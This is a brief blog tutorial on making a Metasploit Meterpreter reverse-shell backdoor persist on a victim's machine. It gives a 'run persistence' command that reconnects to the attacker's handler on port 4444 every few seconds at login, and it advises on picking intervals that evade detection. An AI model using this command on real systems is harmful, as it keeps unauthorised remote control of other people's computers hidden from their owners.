Wednesday, December 4, 2019

Metasploit Meterpreter Persistence even when you are not listening on the port | Just like a RAT

I came across an interesting dilemma, whether we can use meterpreter as a proper persistence remote adminsitration tool.

When i started exploring, i found that we can indeed make meterpreter session persistence, i.e., when you disconnect your PC and connect back the connection connects back to your meterpreter exploit handler

Lets see how to do this

Assume you have created the meterpreter payload (elf or windows binary) and you have started your handler on the port of your choice

Assume we got the connection back after executing the meterpreter binary

At this point, we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection will be lost as long as it does not “visualize” the image again. To avoid this, we should use a Ruby script called “persistence” written by Carlos Perez. Showing the help:

So seeing this, our command will be:

run persistence -U -i 5 -p 4444 -r

That is, every time the victim starts the session, the backdoor will try to open the connection every 5 seconds to the address The interval to choose will depend on what the attacker wants, if you want it to be a bit more stealthy, maybe with 5 min it is fine, if the interval is small, it is more likely to be detected.

Cheers, use this responsibly



Post a Comment